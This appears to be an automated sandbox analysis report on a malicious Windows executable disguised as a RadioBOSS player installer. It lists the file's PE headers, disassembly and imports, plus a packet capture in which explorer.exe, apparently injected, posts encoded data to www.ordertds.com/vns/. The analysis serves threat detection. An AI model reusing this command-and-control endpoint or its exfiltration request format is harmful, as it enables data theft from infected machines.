Time Stamp:	0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007F8110DB6DF3h
push ebx
call 00007F8110DB9F56h
cmp eax, ebx
je 00007F8110DB6DE9h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F8110DB9ED2h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F8110DB6DCDh
push 0000000Bh
call 00007F8110DB9F2Ah
push 00000009h
call 00007F8110DB9F23h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007F8110DB9F17h
cmp eax, ebx
je 00007F8110DB6DF1h
push 0000001Eh
call eax
test eax, eax
je 00007F8110DB6DE9h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x3ebb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	False	0.66823682598	data	6.43498570321	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4625	data	5.26100389731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25538	0x600	False	0.463541666667	data	4.133728555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x3ebb8	0x3ec00	False	0.536327346863	data	6.76327266831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x38388	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x48bb0	0xef03	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x57ab8	0x94a8	data	English	United States
RT_ICON	0x60f60	0x78c6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x68828	0x5488	data	English	United States
RT_ICON	0x6dcb0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 8454143, next used block 4294902016	English	United States
RT_ICON	0x71ed8	0x25a8	data	English	United States
RT_ICON	0x74480	0x10a8	data	English	United States
RT_ICON	0x75528	0x988	data	English	United States
RT_ICON	0x75eb0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x76318	0x100	data	English	United States
RT_DIALOG	0x76418	0x11c	data	English	United States
RT_DIALOG	0x76538	0x60	data	English	United States
RT_GROUP_ICON	0x76598	0x92	data	English	United States
RT_VERSION	0x76630	0x248	data	English	United States
RT_MANIFEST	0x76878	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Version Infos

Description	Data
LegalCopyright	djsoft.net (c) 2003-2017
ProductName	RadioBOSS Assembly
FileDescription	RadioBOSS - player toolkit
FileVersion	3.5.0.43
CompanyName	djsoft.net
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 23:55:55.595859051 CEST	49747	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:55.731275082 CEST	80	49747	161.47.48.3	192.168.2.3
May 12, 2021 23:55:55.731493950 CEST	49747	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:55.731807947 CEST	49747	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:55.867681026 CEST	80	49747	161.47.48.3	192.168.2.3
May 12, 2021 23:55:55.868123055 CEST	49747	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:55.868259907 CEST	49747	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:56.004786968 CEST	80	49747	161.47.48.3	192.168.2.3
May 12, 2021 23:55:57.924479008 CEST	49748	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.064393044 CEST	80	49748	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.064615965 CEST	49748	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.065058947 CEST	49748	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.065145969 CEST	49748	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.067203999 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.203192949 CEST	80	49748	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.203311920 CEST	80	49748	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.203439951 CEST	49748	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.205754042 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.205919981 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.211389065 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.349348068 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.349445105 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.349483013 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.349796057 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.349889040 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.487833023 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.487890005 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.487919092 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.487924099 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.487943888 CEST	80	49749	161.47.48.3	192.168.2.3
May 12, 2021 23:55:58.487972021 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.487994909 CEST	49749	80	192.168.2.3	161.47.48.3
May 12, 2021 23:55:58.488063097 CEST	49749	80	192.168.2.3	161.47.48.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 23:53:51.577903986 CEST	60152	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:51.636151075 CEST	53	60152	8.8.8.8	192.168.2.3
May 12, 2021 23:53:51.990535021 CEST	57544	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:52.042638063 CEST	53	57544	8.8.8.8	192.168.2.3
May 12, 2021 23:53:52.896580935 CEST	55984	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:52.948304892 CEST	53	55984	8.8.8.8	192.168.2.3
May 12, 2021 23:53:53.815751076 CEST	64185	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:53.864538908 CEST	53	64185	8.8.8.8	192.168.2.3
May 12, 2021 23:53:54.868768930 CEST	65110	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:54.919583082 CEST	53	65110	8.8.8.8	192.168.2.3
May 12, 2021 23:53:56.030796051 CEST	58361	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:56.084427118 CEST	53	58361	8.8.8.8	192.168.2.3
May 12, 2021 23:53:57.468302011 CEST	63492	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:57.517468929 CEST	53	63492	8.8.8.8	192.168.2.3
May 12, 2021 23:53:58.383852959 CEST	60831	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:58.443798065 CEST	53	60831	8.8.8.8	192.168.2.3
May 12, 2021 23:53:59.497608900 CEST	60100	53	192.168.2.3	8.8.8.8
May 12, 2021 23:53:59.546653986 CEST	53	60100	8.8.8.8	192.168.2.3
May 12, 2021 23:54:00.673537970 CEST	53195	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:00.725301027 CEST	53	53195	8.8.8.8	192.168.2.3
May 12, 2021 23:54:01.779297113 CEST	50141	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:01.827991009 CEST	53	50141	8.8.8.8	192.168.2.3
May 12, 2021 23:54:02.695101976 CEST	53023	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:02.743920088 CEST	53	53023	8.8.8.8	192.168.2.3
May 12, 2021 23:54:03.594871998 CEST	49563	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:03.643802881 CEST	53	49563	8.8.8.8	192.168.2.3
May 12, 2021 23:54:04.788209915 CEST	51352	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:04.837111950 CEST	53	51352	8.8.8.8	192.168.2.3
May 12, 2021 23:54:06.090673923 CEST	59349	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:06.139563084 CEST	53	59349	8.8.8.8	192.168.2.3
May 12, 2021 23:54:06.982069969 CEST	57084	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:07.041058064 CEST	53	57084	8.8.8.8	192.168.2.3
May 12, 2021 23:54:08.192017078 CEST	58823	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:08.243918896 CEST	53	58823	8.8.8.8	192.168.2.3
May 12, 2021 23:54:09.331438065 CEST	57568	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:09.380321026 CEST	53	57568	8.8.8.8	192.168.2.3
May 12, 2021 23:54:10.249254942 CEST	50540	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:10.298285961 CEST	53	50540	8.8.8.8	192.168.2.3
May 12, 2021 23:54:25.044090986 CEST	54366	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:25.104439020 CEST	53	54366	8.8.8.8	192.168.2.3
May 12, 2021 23:54:32.656090975 CEST	53034	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:32.715226889 CEST	53	53034	8.8.8.8	192.168.2.3
May 12, 2021 23:54:38.843101025 CEST	57762	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:38.902909040 CEST	53	57762	8.8.8.8	192.168.2.3
May 12, 2021 23:54:47.755395889 CEST	55435	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:47.774725914 CEST	50713	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:47.828986883 CEST	53	55435	8.8.8.8	192.168.2.3
May 12, 2021 23:54:47.833997965 CEST	53	50713	8.8.8.8	192.168.2.3
May 12, 2021 23:54:47.945705891 CEST	56132	53	192.168.2.3	8.8.8.8
May 12, 2021 23:54:48.006572008 CEST	53	56132	8.8.8.8	192.168.2.3
May 12, 2021 23:55:02.489434004 CEST	58987	53	192.168.2.3	8.8.8.8
May 12, 2021 23:55:02.562650919 CEST	53	58987	8.8.8.8	192.168.2.3
May 12, 2021 23:55:06.198210001 CEST	56579	53	192.168.2.3	8.8.8.8
May 12, 2021 23:55:06.256849051 CEST	53	56579	8.8.8.8	192.168.2.3
May 12, 2021 23:55:38.337017059 CEST	60633	53	192.168.2.3	8.8.8.8
May 12, 2021 23:55:38.402394056 CEST	53	60633	8.8.8.8	192.168.2.3
May 12, 2021 23:55:40.900888920 CEST	61292	53	192.168.2.3	8.8.8.8
May 12, 2021 23:55:40.958981991 CEST	53	61292	8.8.8.8	192.168.2.3
May 12, 2021 23:55:55.507982016 CEST	63619	53	192.168.2.3	8.8.8.8
May 12, 2021 23:55:55.572113991 CEST	53	63619	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 23:55:55.507982016 CEST	192.168.2.3	8.8.8.8	0xc67	Standard query (0)	www.ordertds.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 23:55:55.572113991 CEST	8.8.8.8	192.168.2.3	0xc67	No error (0)	www.ordertds.com	ordertds.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 23:55:55.572113991 CEST	8.8.8.8	192.168.2.3	0xc67	No error (0)	ordertds.com		161.47.48.3	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ordertds.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49747	161.47.48.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 23:55:55.731807947 CEST	4760	OUT	GET /vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd HTTP/1.1 Host: www.ordertds.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 23:55:55.867681026 CEST	4761	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd&BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 12 May 2021 21:55:55 GMT Connection: close Content-Length: 346 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 72 64 65 72 74 64 73 2e 63 6f 6d 2f 76 6e 73 2f 3f 42 6c 50 3d 37 2b 5a 4b 55 6e 68 34 75 39 55 4d 74 4b 77 42 39 38 67 77 78 2f 5a 4f 30 64 6a 73 76 52 30 77 2f 54 46 77 30 35 38 5a 33 42 67 49 2b 49 4d 74 78 34 30 6e 2b 2b 4e 55 79 53 34 50 32 33 63 54 31 36 57 64 26 61 6d 70 3b 76 46 4e 4c 3d 55 46 4e 78 38 62 66 70 69 78 44 64 26 61 6d 70 3b 42 6c 50 3d 37 2b 5a 4b 55 6e 68 34 75 39 55 4d 74 4b 77 42 39 38 67 77 78 2f 5a 4f 30 64 6a 73 76 52 30 77 2f 54 46 77 30 35 38 5a 33 42 67 49 2b 49 4d 74 78 34 30 6e 2b 2b 4e 55 79 53 34 50 32 33 63 54 31 36 57 64 26 61 6d 70 3b 76 46 4e 4c 3d 55 46 4e 78 38 62 66 70 69 78 44 64 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ordertds.com/vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd&BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd">here</a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	161.47.48.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 23:55:58.065058947 CEST	4762	OUT	POST /vns/ HTTP/1.1 Host: www.ordertds.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.ordertds.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.ordertds.com/vns/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).
May 12, 2021 23:55:58.203311920 CEST	4763	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.ordertds.com/vns/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 12 May 2021 21:55:58 GMT Connection: close Content-Length: 152 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 72 64 65 72 74 64 73 2e 63 6f 6d 2f 76 6e 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ordertds.com/vns/">here</a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49749	161.47.48.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 23:55:58.211389065 CEST	4771	OUT	POST /vns/ HTTP/1.1 Host: www.ordertds.com Connection: close Content-Length: 188725 Cache-Control: no-cache Origin: http://www.ordertds.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.ordertds.com/vns/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 6c 50 3d 7a 63 56 77 4b 48 55 57 6f 74 6b 64 78 4c 38 4d 73 73 56 4c 75 37 68 53 7a 5f 53 78 70 54 6f 45 6e 6c 4d 33 71 61 73 6e 30 6a 49 58 38 59 6b 41 68 36 6c 42 77 65 31 58 67 33 77 78 31 54 39 5f 7e 37 50 51 78 70 79 6f 78 59 65 43 44 71 33 53 7a 6f 32 76 33 64 39 53 54 53 77 45 4b 73 5a 47 77 79 52 5f 37 37 44 78 4c 30 66 73 59 34 61 34 77 38 35 46 64 38 75 6b 45 42 33 75 65 43 75 55 32 36 51 4f 68 4f 6a 78 54 46 68 5f 69 4f 4a 76 62 42 4d 34 69 59 48 73 67 68 55 76 30 73 74 77 35 2d 6f 38 76 4d 31 39 6b 37 57 63 6a 70 42 35 34 71 75 71 43 38 58 75 78 68 77 6d 75 4c 4e 69 78 2d 73 6a 38 30 54 6e 4b 77 61 53 44 31 71 66 77 73 28 57 32 2d 74 39 7a 77 33 6a 4d 75 4e 59 36 37 36 59 52 67 39 55 34 71 78 69 4e 54 47 61 4c 43 45 50 4b 67 71 30 61 51 76 4c 4b 41 56 49 77 75 6c 48 72 54 49 4d 75 61 59 49 69 4a 47 77 59 38 46 37 4f 49 38 32 72 4f 61 38 77 6a 62 4d 76 39 4f 31 33 43 36 7a 30 4d 43 41 39 48 42 42 38 36 4f 49 59 4a 48 47 6c 51 38 72 70 42 51 79 50 5f 74 6f 38 70 58 44 37 75 38 62 51 68 63 74 4f 36 45 4f 47 32 41 6c 76 7a 36 35 4a 70 71 44 67 45 67 32 54 54 61 74 57 36 71 49 35 4d 66 61 73 38 69 78 34 65 55 61 66 38 76 6f 53 47 6e 5a 72 37 56 56 4f 73 69 65 62 2d 45 48 47 47 50 30 78 41 47 35 75 46 46 7a 41 76 72 58 76 70 65 77 7a 7a 54 44 64 43 77 34 63 55 63 7a 67 31 31 6d 59 64 56 58 36 56 74 53 30 36 6d 55 37 75 75 6d 50 70 37 30 67 43 51 62 55 6e 57 47 4a 73 31 41 72 36 42 4f 70 6b 78 65 79 4b 50 68 5a 35 52 50 6d 6b 32 4d 72 6d 6b 43 76 2d 43 75 77 6e 51 35 6e 51 69 72 66 48 52 52 6f 33 64 4a 32 7a 41 4e 53 52 63 65 63 4f 5a 57 46 64 55 46 54 44 43 78 7a 6f 68 72 74 2d 39 74 46 33 72 76 7e 77 30 47 67 72 73 76 4c 44 4b 39 64 4f 4d 4f 58 78 43 34 6c 50 6b 55 48 56 33 43 49 6c 46 35 4e 49 39 68 47 34 46 51 4b 67 28 57 52 4c 72 71 31 4e 31 70 38 51 76 54 73 38 31 6c 4e 5a 4c 30 73 44 54 63 73 66 6c 55 28 70 59 4f 28 6d 78 42 70 76 46 7a 42 65 73 32 6b 52 65 5f 34 4c 4c 4a 58 51 64 62 69 6b 56 4f 48 49 34 37 55 44 47 51 55 31 32 35 49 63 28 74 77 5f 78 53 37 67 6f 46 49 66 55 6f 75 30 35 73 79 53 74 35 45 6a 48 6f 38 36 68 2d 61 42 61 50 35 77 6c 4d 77 6c 34 31 35 46 75 4d 75 32 49 6b 43 2d 59 57 41 70 52 31 31 49 35 4a 33 52 62 75 4b 64 53 45 33 50 59 41 37 36 39 74 31 61 45 4d 58 61 57 46 56 77 76 51 42 42 44 66 6e 30 55 41 28 6b 65 38 36 6b 4d 70 6f 6f 6d 38 76 67 6c 43 73 61 41 55 4f 50 5a 61 6d 70 48 45 62 79 74 49 6f 6b 68 49 42 46 73 4c 78 76 50 6d 57 5a 74 48 42 78 4e 79 53 34 68 41 49 57 7a 57 4d 70 37 53 59 7a 6f 48 6a 79 72 7a 61 37 42 50 62 77 63 2d 4a 39 76 64 4f 39 61 79 32 2d 77 35 53 6a 4d 36 69 35 61 4f 58 6d 30 54 43 77 6d 41 4e 43 7a 39 77 4f 65 2d 76 69 64 37 78 4c 67 45 38 30 33 5a 5a 4a 67 32 59 4b 37 53 44 35 59 4a 76 43 45 35 47 2d 30 71 75 43 64 68 59 37 75 62 6e 46 72 72 38 51 4d 72 35 35 6d 31 49 54 4e 73 73 7a 44 41 35 64 4d 74 75 34 52 39 42 78 76 62 71 75 6f 59 54 6d 57 63 61 38 33 61 65 52 32 47 